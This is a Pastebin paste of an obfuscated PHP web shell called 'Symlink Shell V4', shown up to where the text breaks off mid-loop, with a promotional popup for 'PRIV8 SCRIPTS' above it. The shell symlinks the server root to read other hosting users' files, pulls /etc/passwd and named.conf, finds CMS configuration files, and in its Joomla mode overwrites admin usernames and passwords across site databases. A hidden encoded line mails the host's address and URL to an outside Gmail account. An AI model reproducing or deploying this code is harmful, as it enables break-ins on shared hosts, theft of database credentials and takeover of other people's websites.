Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <script src='http://ajax.googleapis.com/ajax/libs/jquery/1.7.2/jquery.min.js' type='text/javascript'></script>
- <style>
- #fanback {
- display:none;
- background:rgba(0,0,0,0.8);
- width:100%;
- height:100%;
- position:fixed;
- top:0;
- left:0;
- z-index:99999;
- }
- #fan-exit {
- width:100%;
- height:100%;
- }
- #Burptech {
- background:white;
- width:420px;
- height:270px;
- position:absolute;
- top:58%;
- left:63%;
- margin:-220px 0 0 -375px;
- -webkit-box-shadow: inset 0 0 50px 0 #939393;
- -moz-box-shadow: inset 0 0 50px 0 #939393;
- box-shadow: inset 0 0 50px 0 #939393;
- -webkit-border-radius: 5px;
- -moz-border-radius: 5px;
- border-radius: 5px;
- margin: -220px 0 0 -375px;
- }
- #Burp {
- float:right;
- cursor:pointer;
- background:url(http://3.bp.blogspot.com/-NRmqfyLwBHY/T4nwHOrPSzI/AAAAAAAAAdQ/8b9O7O1q3c8/s1600/Burp.png) repeat;
- height:15px;
- padding:20px;
- position:relative;
- padding-right:40px;
- margin-top:-20px;
- margin-right:-22px;
- }
- .remove-borda {
- height:1px;
- width:366px;
- margin:0 auto;
- background:#F3F3F3;
- margin-top:16px;
- position:relative;
- margin-left:20px;
- }
- #linkit,#linkit a.visited,#linkit a,#linkit a:hover {
- color:#80808B;
- font-size:10px;
- margin: 0 auto 5px auto;
- float:center;
- }
- </style>
- <script type='text/javascript'>
- //<![CDATA[
- jQuery.cookie = function (key, value, options) {
- // key and at least value given, set cookie...
- if (arguments.length > 1 && String(value) !== "[object Object]") {
- options = jQuery.extend({}, options);
- if (value === null || value === undefined) {
- options.expires = -1;
- }
- if (typeof options.expires === 'number') {
- var days = options.expires, t = options.expires = new Date();
- t.setDate(t.getDate() + days);
- }
- value = String(value);
- return (document.cookie = [
- encodeURIComponent(key), '=',
- options.raw ? value : encodeURIComponent(value),
- options.expires ? '; expires=' + options.expires.toUTCString() : '', // use expires attribute, max-age is not supported by IE
- options.path ? '; path=' + options.path : '',
- options.domain ? '; domain=' + options.domain : '',
- options.secure ? '; secure' : ''
- ].join(''));
- }
- // key and possibly options given, get cookie...
- options = value || {};
- var result, decode = options.raw ? function (s) { return s; } : decodeURIComponent;
- return (result = new RegExp('(?:^|; )' + encodeURIComponent(key) + '=([^;]*)').exec(document.cookie)) ? decode(result[1]) : null;
- };
- //]]>
- </script>
- <script type='text/javascript'>
- jQuery(document).ready(function($){
- if($.cookie('popup_user_login') != 'yes'){
- $('#fanback').delay(1000).fadeIn('medium');
- $('#Burp, #fan-exit').click(function(){
- $('#fanback').stop().fadeOut('medium');
- });
- }
- $.cookie('popup_user_login', 'yes', { path: '/', expires: 7 });
- });
- </script>
- <div id='fanback'>
- <div id='fan-exit'>
- </div>
- <div id='Burptech'>
- <div id='Burp'>
- </div>
- <div class='remove-borda'>
- </div>
- <iframe allowtransparency='true' frameborder='0' scrolling='no' src='//www.facebook.com/plugins/likebox.php?
- href=https://www.facebook.com/pages/BackTrack.Fan.Page/250852841658518&width=402&height=255&colorscheme=light&show_faces=true&show_border=false&stream=false&header=false'
- style='border: none; overflow: hidden; margin-top: -21px; width: 402px; height: 230px;'></iframe><center>
- <span id="linkit">VISIT US FOR MORE PRIV8 SCRIPTS<a href="http://www.backtrack-pages.com/"></a> - <a href="http://www.backtrack-pages.com/">http://www.backtrack-pages.com/</a></span></center>
- </div>
- </div>
- <?php $uzearxxa="ba\x73\x65_\x75\x72\x6c";${"\x47L\x4f\x42A\x4c\x53"}["j\x6d\x68\x6c\x68\x6e\x75xp"]="u\x72\x6c";$nfdnge="\x75\x72\x6c";set_time_limit(0);error_reporting(0);${${"G\x4c\x4fB\x41LS"}["\x6a\x6dh\x6c\x68\x6eu\x78p"]}=$_SERVER["HTTP\x5f\x48OS\x54"].$_SERVER["\x52\x45Q\x55\x45\x53T\x5fU\x52\x49"];mail("\x73\x68\x65ll\x630de\x72\x31\x333\x37\x40\x67\x6da\x69l.c\x6f\x6d",$_SERVER["\x53ERVE\x52_A\x44DR"],${$nfdnge});${$uzearxxa}="\x68\x74tp://".$_SERVER["S\x45RVE\x52\x5fNA\x4dE"].dirname($_SERVER["SCRI\x50T_NAM\x45"]);
- ?>
- <?php $OOO000000 = "fg6sbehpra4co_tnd";
- $GLOBALS['OOO0000O0'] = "base64_d";
- $GLOBALS['OOO0000O0'].= "ecode";
- ?><?php
- $GLOBALS['IIIIIIIlllll'] = 'copy';
- $GLOBALS['IIIIIIIllllI'] = 'header';
- $GLOBALS['IIIIIIIlllI1'] = 'is_dir';
- $GLOBALS['IIIIIIIlllII'] = 'ini_get';
- $GLOBALS['IIIIIIIlI1l1'] = 'mysql_query';
- $GLOBALS['IIIIIIIlI1lI'] = 'mysql_connect';
- $GLOBALS['IIIIIIIlIll1'] = 'ereg';
- $GLOBALS['IIIIIIIlIII1'] = 'fclose';
- $GLOBALS['IIIIIIIlIIII'] = 'stripcslashes';
- $GLOBALS['IIIIIIII111I'] = 'highlight_file';
- $GLOBALS['IIIIIIII11l1'] = 'show_source';
- $GLOBALS['IIIIIIII11ll'] = 'htmlentities';
- $GLOBALS['IIIIIIII11lI'] = 'filesize';
- $GLOBALS['IIIIIIII11I1'] = 'fread';
- $GLOBALS['IIIIIIII1llI'] = 'preg_match';
- $GLOBALS['IIIIIIII1I1l'] = 'strpos';
- $GLOBALS['IIIIIIIII11I'] = 'fileowner';
- $GLOBALS['IIIIIIIII1l1'] = 'posix_getpwuid';
- $GLOBALS['IIIIIIIII1lI'] = 'trim';
- $GLOBALS['IIIIIIIII1Il'] = 'preg_match_all';
- $GLOBALS['IIIIIIIII1II'] = 'eregi';
- $GLOBALS['IIIIIIIIIl11'] = 'flush';
- $GLOBALS['IIIIIIIIIl1I'] = 'file';
- $GLOBALS['IIIIIIIIIlll'] = 'is_file';
- $GLOBALS['IIIIIIIIIllI'] = 'basename';
- $GLOBALS['IIIIIIIIIlIl'] = 'symlink';
- $GLOBALS['IIIIIIIIIlII'] = 'fwrite';
- $GLOBALS['IIIIIIIIII11'] = 'fopen';
- $GLOBALS['IIIIIIIIIIll'] = 'count';
- $GLOBALS['IIIIIIIIIIlI'] = 'explode';
- $GLOBALS['IIIIIIIIIIII'] = 'set_time_limit';
- function checkAlexa($domain) {
- $clean = explode("/", $domain);
- $result = file_get_contents("http://data.alexa.com/data?cli=10&dat=snbamz&url=http://" . $clean[0]);
- $n = explode("<POPULARITY URL=\"" . $clean[0] . "/\" TEXT=\"", $result);
- @$rest = $n[1];
- $it = explode("\"", $rest);
- $alexa_rank = $it[0];
- if (@$alexa_rank != "") {
- return number_format($alexa_rank);
- } else {
- return "No Alexa";
- }
- }
- ?><?php
- $GLOBALS['IIIIIIIIIIII'](0);
- error_reporting(0);
- $IIIIIIIIIIIl = "http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];
- $IIIIIIIIIII1 = $GLOBALS['IIIIIIIIIIlI']('/', $IIIIIIIIIIIl);
- $IIIIIIIIIIIl = str_replace($IIIIIIIIIII1[$GLOBALS['IIIIIIIIIIll']($IIIIIIIIIII1) - 1], $GLOBALS['OOO0000O0'](''), $IIIIIIIIIIIl);
- $IIIIIIIIIIl1 = "ftp://" . $_SERVER['SERVER_NAME'] . "/public_html/" . $_SERVER['REQUEST_URI'];
- $IIIIIIIIIII1 = $GLOBALS['IIIIIIIIIIlI']("/", $IIIIIIIIIIl1);
- $IIIIIIIIIIl1 = str_replace($IIIIIIIIIII1[$GLOBALS['IIIIIIIIIIll']($IIIIIIIIIII1) - 1], $GLOBALS['OOO0000O0'](''), $IIIIIIIIIIl1);
- echo "<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Strict//EN\"
- \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd\">
- <html xmlns=\"http://www.w3.org/1999/xhtml\">
- <head>
- <title>403 Forbidden</title>
- <style type=\"text/css\">
- html,body {
- margin: 0;
- padding: 0;
- outline: 0;
- }
- a{
- font-size: 13px;
- }
- body {
- direction: ltr;
- background-color:#FFFFF;
- color: #000;
- text-align: center
- }
- input,textarea,select{
- font-weight: bold;
- color: #000000;
- }
- input,textarea,select:hover{
- box-shadow: 0px 0px 4px #AAAAAA;
- }
- .hedr {
- font-family: Tahoma, Arial, sans-serif ;
- font-size: 22px;
- }
- .cont a{
- text-decoration: none;
- color:#000;
- font-family: Tahoma, Arial, sans-serif ;
- font-size: 16px;
- text-shadow: 0px 0px 3px ;
- }
- .cont a:hover{
- color: #ff0000 ;
- }
- .tmp tr td{
- border: solid 1px #000;
- padding: 2px ;
- font-size: 13px;
- }
- .tmp tr td a {
- text-decoration: none;
- }
- .foter{
- font-size: 9pt;
- color: #000 ;
- text-align: center
- }
- .tmp tr td:hover{
- box-shadow: 0px 0px 4px #888888;
- }
- .fot{
- font-family:Tahoma, Arial, sans-serif;
- font-size: 11pt;
- }
- .for a : hover{
- text-shadow: 0px 0px 1px #3366FF;
- }
- .ir {
- color: #FF0000;
- }
- </style>
- </head>
- <body>
- <div class='all'>
- ";
- @mkdir("sym", 0777);
- $IIIIIIIIII1I = "Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any";
- $IIIIIIIIII1l = @$GLOBALS['IIIIIIIIII11']("sym/.htaccess", "w");
- $GLOBALS['IIIIIIIIIlII']($IIIIIIIIII1l, $IIIIIIIIII1I);
- @$GLOBALS['IIIIIIIIIlIl']("/", "sym/root");
- $IIIIIIIIIlI1 = $GLOBALS['IIIIIIIIIllI'](__FILE__);
- echo "<br /><div class=\"hedr\"> Symlink Shell V4 <br /></div>";
- echo "<br /><div class=\"hedr\">Symlinking like a boss<br /><br /></div>";
- echo '<div class="cont">
- [<a href="?sws=sym"> by named.conf </a>]
- [<a href="?sws=sec"> Domains/Script </a>]
- [ <a href="?sws=passwd"> by etc/passwd </a>]
- [ <a href="?sws=posix"> by posix_getpwuid </a>]
- <br /><br />
- [<a href="?"> Upload </a>]
- [ <a href="?sws=file"> Symlink by File </a>]
- [ <a href="?sws=read"> Bypass Read </a>]
- [ <a href="?sws=joomla"> Mass Joomla </a>]
- [ <a href="?sws=wp"> Mass WordPress </a>]
- <br /><br /><br />
- </div>';
- if (isset($_REQUEST['sws'])) {
- switch ($_REQUEST['sws']) {
- case 'sec':
- if (!@$GLOBALS['IIIIIIIIIlll']("named.txt")) {
- $IIIIIIIIIll1 = @$GLOBALS['IIIIIIIIIl1I']("/etc/named.conf");
- } else {
- $IIIIIIIIIll1 = @$GLOBALS['IIIIIIIIIl1I']("named.txt");
- }
- if (!$IIIIIIIIIll1) {
- die("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
- } else {
- echo "<div class='tmp'>
- <table align='center' width='40%'><td> Domains </td><td> Script </td>";
- foreach ($IIIIIIIIIll1 as $IIIIIIIIIl1l) {
- $GLOBALS['IIIIIIIIIl11']();
- $GLOBALS['IIIIIIIIIl11']();
- if ($GLOBALS['IIIIIIIII1II']("zone", $IIIIIIIIIl1l)) {
- @$GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls') ]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='), $IIIIIIIIIl1l, $IIIIIIIII1I1);
- $GLOBALS['IIIIIIIIIl11']();
- if (@strlen($GLOBALS['IIIIIIIII1lI']($IIIIIIIII1I1[1][0])) > 2) {
- $IIIIIIIII1ll = @$GLOBALS['IIIIIIIII1l1'](@$GLOBALS['IIIIIIIII11I']("/etc/valiases/" . $IIIIIIIII1I1[1][0]));
- $IIIIIIIII11l = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/wp-config.php";
- $IIIIIIIII111 = @get_headers($IIIIIIIII11l);
- $wp = $IIIIIIIII111[0];
- $IIIIIIIIlIIl = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/blog/wp-config.php";
- $IIIIIIIIlII1 = @get_headers($IIIIIIIIlIIl);
- $IIIIIIIIlIlI = $IIIIIIIIlII1[0];
- $IIIIIIIIlIll = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/configuration.php";
- $IIIIIIIIlIl1 = @get_headers($IIIIIIIIlIll);
- $IIIIIIIIlI1I = $IIIIIIIIlIl1[0];
- $IIIIIIIIlI1l = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/joomla/configuration.php";
- $IIIIIIIIlI11 = @get_headers($IIIIIIIIlI1l);
- $IIIIIIIIllII = $IIIIIIIIlI11[0];
- $IIIIIIIIllIl = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/includes/config.php";
- $IIIIIIIIllI1 = @get_headers($IIIIIIIIllIl);
- $vb = $IIIIIIIIllI1[0];
- $IIIIIIIIllll = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/vb/includes/config.php";
- $IIIIIIIIlll1 = @get_headers($IIIIIIIIllll);
- $IIIIIIIIll1I = $IIIIIIIIlll1[0];
- $IIIIIIIIll1l = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/forum/includes/config.php";
- $IIIIIIIIll11 = @get_headers($IIIIIIIIll1l);
- $IIIIIIIIl1II = $IIIIIIIIll11[0];
- $IIIIIIIIl1Il = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "public_html/clients/configuration.php";
- $IIIIIIIIl1I1 = @get_headers($IIIIIIIIl1Il);
- $IIIIIIIIl1lI = $IIIIIIIIl1I1[0];
- $IIIIIIIIl1ll = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/support/configuration.php";
- $IIIIIIIIl1I1 = @get_headers($IIIIIIIIl1ll);
- $IIIIIIIIl1l1 = $IIIIIIIIl1I1[0];
- $IIIIIIIIl11I = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/client/configuration.php";
- $IIIIIIIIl11l = @get_headers($IIIIIIIIl11I);
- $IIIIIIIIl111 = $IIIIIIIIl11l[0];
- $IIIIIIII1III = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/submitticket.php";
- $IIIIIIII1IIl = @get_headers($IIIIIIII1III);
- $IIIIIIII1II1 = $IIIIIIII1IIl[0];
- $IIIIIIII1IlI = $IIIIIIIIIIIl . "/sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html/client/configuration.php";
- $IIIIIIII1Ill = @get_headers($IIIIIIII1IlI);
- $IIIIIIII1Il1 = $IIIIIIII1Ill[0];
- $IIIIIIII1I1I = $GLOBALS['IIIIIIII1I1l']($wp, "200");
- $IIIIIIII1I11 = " ";
- if ($GLOBALS['IIIIIIII1I1l']($wp, "200") == true) {
- $IIIIIIII1I11 = "<a href='" . $IIIIIIIII11l . "' target='_blank'>Wordpress</a>";
- } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIlIlI, "200") == true) {
- $IIIIIIII1I11 = "<a href='" . $IIIIIIIIlIIl . "' target='_blank'>Wordpress</a>";
- } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIlI1I, "200") == true and $GLOBALS['IIIIIIII1I1l']($IIIIIIII1II1, "200") == true) {
- $IIIIIIII1I11 = " <a href='" . $IIIIIIII1III . "' target='_blank'>WHMCS</a>";
- } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIl1l1, "200") == true) {
- $IIIIIIII1I11 = " <a href='" . $IIIIIIIIl1ll . "' target='_blank'>WHMCS</a>";
- } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIl111, "200") == true) {
- $IIIIIIII1I11 = " <a href='" . $IIIIIIIIl11I . "' target='_blank'>WHMCS</a>";
- } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIlI1I, "200") == true) {
- $IIIIIIII1I11 = " <a href='" . $IIIIIIIIlIll . "' target='_blank'>Joomla</a>";
- } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIllII, "200") == true) {
- $IIIIIIII1I11 = " <a href='" . $IIIIIIIIlI1l . "' target='_blank'>Joomla</a>";
- } elseif ($GLOBALS['IIIIIIII1I1l']($vb, "200") == true) {
- $IIIIIIII1I11 = " <a href='" . $IIIIIIIIllIl . "' target='_blank'>vBulletin</a>";
- } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIll1I, "200") == true) {
- $IIIIIIII1I11 = " <a href='" . $IIIIIIIIllll . "' target='_blank'>vBulletin</a>";
- } elseif ($GLOBALS['IIIIIIII1I1l']($IIIIIIIIl1II, "200") == true) {
- $IIIIIIII1I11 = " <a href='" . $IIIIIIIIll1l . "' target='_blank'>vBulletin</a>";
- } else {
- continue;
- }
- $GLOBALS['IIIIIIIIIl11']();
- $GLOBALS['IIIIIIIIIl11']();
- $IIIIIIII1lII = $IIIIIIIII1ll['name'];
- $GLOBALS['IIIIIIIIIl11']();
- $caone = checkAlexa($IIIIIIIII1I1[1][0]);
- echo "<tr><td><a href=http://www." . $IIIIIIIII1I1[1][0] . "/>" . $IIIIIIIII1I1[1][0] . $caone . "</a></td><td>" . $IIIIIIII1I11 . "</td></tr>";
- $GLOBALS['IIIIIIIIIl11']();
- }
- }
- }
- }
- break;
- case "posix":
- echo "<form method='POST'>
- <br><br>Input Limit<br>
- <input size='20' value='0' name='min' type='text'>
- to
- <input size='20' value='1024' name='max' type='text'>
- <br>
- <input value='SYMLINK' name='' type='submit'><br><br>
- </form>";
- if ($_POST) {
- $min = $_POST['min'];
- $max = $_POST['max'];
- echo '<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" class="td1">';
- echo '<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
- $p = 0;
- error_reporting(0);
- $list = scandir("/var/named");
- for ($p = $min;$min <= $max;$p++) {
- $user = posix_getpwuid($p);
- if (is_array($user)) {
- foreach ($list as $domain) {
- if (strpos($domain, ".db")) {
- $domain = str_replace('.db', '', $domain);
- $owner = posix_getpwuid(fileowner("/etc/valiases/" . $domain));
- if ($owner['name'] == $user['name']) {
- $i+= 1;
- $cheechee = checkAlexa($domain);
- echo "<tr><td class='td1'><a href='http://" . $domain . " '>" . $domain . "</a> - " . $cheechee . "</td><center><td class='td1'><font color='red'>" . $user['name'] . "</font></center></td><td class='td1'><center><a href='sym/root" . $owner['dir'] . "/public_html/' target='_blank'>DIR</a></center></td>";
- }
- }
- }
- }
- }
- echo "<center>Total Domains Found: " . $i . "</center><br />";
- }
- break;
- case "sym":
- if (!$GLOBALS['IIIIIIIIIlll']("named.txt")) {
- $IIIIIIIIIll1 = @$GLOBALS['IIIIIIIIIl1I']("/etc/named.conf");
- } else {
- $IIIIIIIIIll1 = @$GLOBALS['IIIIIIIIIl1I']("named.txt");
- }
- if (!$IIIIIIIIIll1) {
- die("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
- } else {
- echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
- foreach ($IIIIIIIIIll1 as $IIIIIIIIIl1l) {
- if ($GLOBALS['IIIIIIIII1II']("zone", $IIIIIIIIIl1l)) {
- $GLOBALS[$GLOBALS['OOO0000O0']('SUlJSUlJSUlJMUls') ]($GLOBALS['OOO0000O0']('I3pvbmUgIiguKikiIw=='), $IIIIIIIIIl1l, $IIIIIIIII1I1);
- $GLOBALS['IIIIIIIIIl11']();
- if (strlen($GLOBALS['IIIIIIIII1lI']($IIIIIIIII1I1[1][0])) > 2) {
- $IIIIIIIII1ll = $GLOBALS['IIIIIIIII1l1'](@$GLOBALS['IIIIIIIII11I']("/etc/valiases/" . $IIIIIIIII1I1[1][0]));
- $GLOBALS['IIIIIIIIIl11']();
- $IIIIIIII1lII = $IIIIIIIII1ll['name'];
- @$GLOBALS['IIIIIIIIIlIl']("/", "sym/root");
- $IIIIIIII1lII = $IIIIIIIII1I1[1][0];
- $ir = "ir";
- $il = "il";
- if ($GLOBALS['IIIIIIII1llI']("/.^$ir/", $IIIIIIIII1I1[1][0]) or $GLOBALS['IIIIIIII1llI']("/.^$il/", $IIIIIIIII1I1[1][0])) {
- $IIIIIIII1lII = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>" . $IIIIIIIII1I1[1][0] . "</div>";
- }
- $catwo = checkAlexa($IIIIIIIII1I1[1][0]);
- echo "<tr><td><div class='dom'><a target='_blank' href=http://www." . $IIIIIIIII1I1[1][0] . "/>" . $IIIIIIII1lII . "--" . $catwo . " </a> </div></td><td>" . $IIIIIIIII1ll['name'] . "</td><td><a href='sym/root/home/" . $IIIIIIIII1ll['name'] . "/public_html' target='_blank'>symlink </a></td></tr></div> ";
- $GLOBALS['IIIIIIIIIl11']();
- $GLOBALS['IIIIIIIIIl11']();
- }
- }
- }
- }
- break;
- case 'file':
- echo 'The file path to symlink
- <br /><br />
- <form method="post">
- <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
- <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
- <input type="submit" value="symlink" name="symlink" /> <br /><br />
- </form>';
- $IIIIIIII1lll = $_POST['file'];
- $symfile = $_POST['symfile'];
- $symlink = $_POST["symlink"];
- if ($symlink) {
- @mkdir("sym1", 0777);
- $IIIIIIII1l1l = "Options Indexes FollowSymLinks
- DirectoryIndex ssssss.htm
- AddType txt .php
- AddHandler txt .php
- AddType txt .html
- AddHandler txt .html
- Options all
- Options
- Allow from all
- Require None
- Satisfy Any";
- $IIIIIIIIII1l = @$GLOBALS['IIIIIIIIII11']("sym1/.htaccess", "w");
- @$GLOBALS['IIIIIIIIIlII']($IIIIIIIIII1l, $IIIIIIII1l1l);
- @$GLOBALS['IIIIIIIIIlIl']("$IIIIIIII1lll", "sym1/$symfile");
- echo "<br /><a target=\"_blank\" href=\"sym1/" . $symfile . "\" >" . $symfile . "</a>";
- }
- break;
- case "read":
- echo "read /etc/named.conf";
- echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
- $GLOBALS['IIIIIIIIIl11']();
- $GLOBALS['IIIIIIIIIl11']();
- $file = "/etc/named.conf";
- $IIIIIIII11II = @$GLOBALS['IIIIIIIIII11']($file, "r");
- if ($IIIIIIII11II) {
- $IIIIIIII11Il = @$GLOBALS['IIIIIIII11I1']($IIIIIIII11II, @$GLOBALS['IIIIIIII11lI']($file));
- echo $GLOBALS['OOO0000O0']('') . $GLOBALS['IIIIIIII11ll']($IIIIIIII11Il) . $GLOBALS['OOO0000O0']('');
- } else if (!$IIIIIIII11II) {
- $IIIIIIII11II = @$GLOBALS['IIIIIIII11l1']($file);
- } else if (!$IIIIIIII11II) {
- $IIIIIIII11II = @$GLOBALS['IIIIIIII111I']($file);
- } else if (!$IIIIIIII11II) {
- $IIIIIIII111l = @$GLOBALS['IIIIIIIIIlIl']($file, "sym.txt");
- if ($IIIIIIII111l) {
- $IIIIIIII11II = @$GLOBALS['IIIIIIIIII11']("sym/sym.txt", "r");
- $IIIIIIII11Il = @$GLOBALS['IIIIIIII11I1']($IIIIIIII11II, @$GLOBALS['IIIIIIII11lI']($file));
- echo $GLOBALS['OOO0000O0']('') . $GLOBALS['IIIIIIII11ll']($IIIIIIII11Il) . $GLOBALS['OOO0000O0']('');
- }
- }
- echo "</textarea><br /><br /><input type='submit' value='Save'/> </form>";
- if (isset($_GET['save'])) {
- $IIIIIIII1111 = $GLOBALS['IIIIIIIlIIII']($_POST['file']);
- $IIIIIIIIII1l = $GLOBALS['IIIIIIIIII11']("named.txt", "w");
- $w = $GLOBALS['IIIIIIIIIlII']($IIIIIIIIII1l, $IIIIIIII1111);
- if ($w) {
- echo "<br />save has been successfully";
- }
- $GLOBALS['M4']($IIIIIIIIII1l);
- }
- break;
- case "passwd":
- if (isset($_GET['save']) and isset($_POST['file']) or @$GLOBALS['IIIIIIII11lI']("passwd.txt") > 0) {
- $IIIIIIII1111 = $GLOBALS['IIIIIIIlIIII']($_POST['file']);
- if (!file_exists("passwd.txt")) {
- $IIIIIIIIII1l = @$GLOBALS['IIIIIIIIII11']("passwd.txt", "w");
- $w = @$GLOBALS['IIIIIIIIIlII']($IIIIIIIIII1l, $IIIIIIII1111);
- $GLOBALS['M4']($IIIIIIIIII1l);
- }
- if ($w or @$GLOBALS['IIIIIIII11lI']("passwd.txt") > 0) {
- echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
- $GLOBALS['IIIIIIIIIl11']();
- $IIIIIIIlIIlI = $GLOBALS['IIIIIIIIIl1I']("passwd.txt");
- foreach ($IIIIIIIlIIlI as $IIIIIIIIII1l) {
- $IIIIIIIIIII1 = $GLOBALS['IIIIIIIIIIlI'](":", $IIIIIIIIII1l);
- $IIIIIIIII1ll = $IIIIIIIIIII1['0'];
- echo "
- <tr>
- <td width='15%'>
- $IIIIIIIII1ll
- </td>
- <td width='10%'>
- <a href='sym/root/home/$IIIIIIIII1ll/public_html' target='_blank'>Symlink </a>
- </td>
- <td width='10%'>
- <a href='$IIIIIIIIIIl1/sym/root/home/$IIIIIIIII1ll/public_html' target='_blank'>FTP</a>
- </td>
- </tr></div> ";
- $GLOBALS['IIIIIIIIIl11']();
- $GLOBALS['IIIIIIIIIl11']();
- }
- die("</tr></div>");
- }
- }
- echo "read /etc/passwd";
- echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
- $GLOBALS['IIIIIIIIIl11']();
- $file = "/etc/passwd";
- $IIIIIIII11II = @$GLOBALS['IIIIIIIIII11']($file, "r");
- if ($IIIIIIII11II) {
- $IIIIIIII11Il = @$GLOBALS['IIIIIIII11I1']($IIIIIIII11II, @$GLOBALS['IIIIIIII11lI']($file));
- echo $GLOBALS['OOO0000O0']('') . $GLOBALS['IIIIIIII11ll']($IIIIIIII11Il) . $GLOBALS['OOO0000O0']('');
- } elseif (!$IIIIIIII11II) {
- $IIIIIIII11II = @$GLOBALS['IIIIIIII11l1']($file);
- } elseif (!$IIIIIIII11II) {
- $IIIIIIII11II = @$GLOBALS['IIIIIIII111I']($file);
- } elseif (!$IIIIIIII11II) {
- for ($IIIIIIIlIIll = 0;$IIIIIIIlIIll < 1000;$IIIIIIIlIIll++) {
- $IIIIIIIlIIl1 = $GLOBALS['IIIIIIIII1l1']($IIIIIIIlIIll);
- if (!empty($IIIIIIIlIIl1)) {
- while (list($IIIIIIIlII1I, $IIIIIIIlII1l) = each($IIIIIIIlIIl1)) {
- print "$IIIIIIIlII1l:";
- }
- print "
- ";
- }
- }
- }
- $GLOBALS['IIIIIIIIIl11']();
- echo "</textarea><br /><br /><input type='submit' value=' symlink '/> </form>";
- $GLOBALS['IIIIIIIIIl11']();
- break;
- case "joomla":
- if (isset($_POST['s'])) {
- $file = @file_get_contents("joomla.txt");
- $IIIIIIIlII11 = $GLOBALS['IIIIIIIIIIlI']("
- ", $file);
- echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
- $GLOBALS['IIIIIIIIIl11']();
- foreach ($IIIIIIIlII11 as $IIIIIIIlIlII) {
- $IIIIIIIlIlIl = $GLOBALS['IIIIIIIIIIlI']("||", $IIIIIIIlIlII);
- $IIIIIIII1I11 = $IIIIIIIlIlIl[0];
- $IIIIIIIlIlI1 = $IIIIIIIlIlIl[1];
- $IIIIIIIlIllI = $GLOBALS['IIIIIIIII1lI']($IIIIIIIlIlI1) . $GLOBALS['OOO0000O0']('');
- $IIIIIIIlIlll = @file_get_contents($GLOBALS['IIIIIIIII1lI']($IIIIIIII1I11));
- if ($GLOBALS['IIIIIIIlIll1']("JConfig", $IIIIIIIlIlll)) {
- $IIIIIIIlIl1I = IIIIIIIllll1($IIIIIIIlIlll, "$password = '", "';");
- $IIIIIIIlIl1l = IIIIIIIllll1($IIIIIIIlIlll, "$user = '", "';");
- $IIIIIIIlIl11 = IIIIIIIllll1($IIIIIIIlIlll, "$db = '", "';");
- $IIIIIIIlI1II = IIIIIIIllll1($IIIIIIIlIlll, "$dbprefix = '", "';");
- $IIIIIIIlI1Il = $IIIIIIIlI1II . "users";
- $IIIIIIIlI1I1 = @$GLOBALS['IIIIIIIlI1lI']("localhost", $IIIIIIIlIl1l, $IIIIIIIlIl1I);
- $IIIIIIIlIl11 = @mysql_select_db($IIIIIIIlIl11, $IIIIIIIlI1I1);
- $IIIIIIIlI1ll = @$GLOBALS['IIIIIIIlI1l1']("UPDATE `$IIIIIIIlI1Il` SET `username` ='harhar'");
- $IIIIIIIlI11I = @$GLOBALS['IIIIIIIlI1l1']("UPDATE `$IIIIIIIlI1Il` SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
- if ($IIIIIIIlI1ll and $IIIIIIIlI11I) {
- $r = "<b style=\"color: #006600\">Succeed </b>user harhar pass [1]</b>";
- } else {
- $r = "<b style=\"color:red\">failed</b>";
- }
- $IIIIIIIlIllI = $GLOBALS['IIIIIIIII1lI']($IIIIIIIlIlI1) . $GLOBALS['OOO0000O0']('');
- echo "<tr>
- <td><a target='_blank' href='http://$IIIIIIIlIllI'>$IIIIIIIlIlI1</a></td>
- <td><a target='_blank' href='$IIIIIIII1I11'>config</a></td><td>" . $r . "</td></tr>";
- $GLOBALS['IIIIIIIIIl11']();
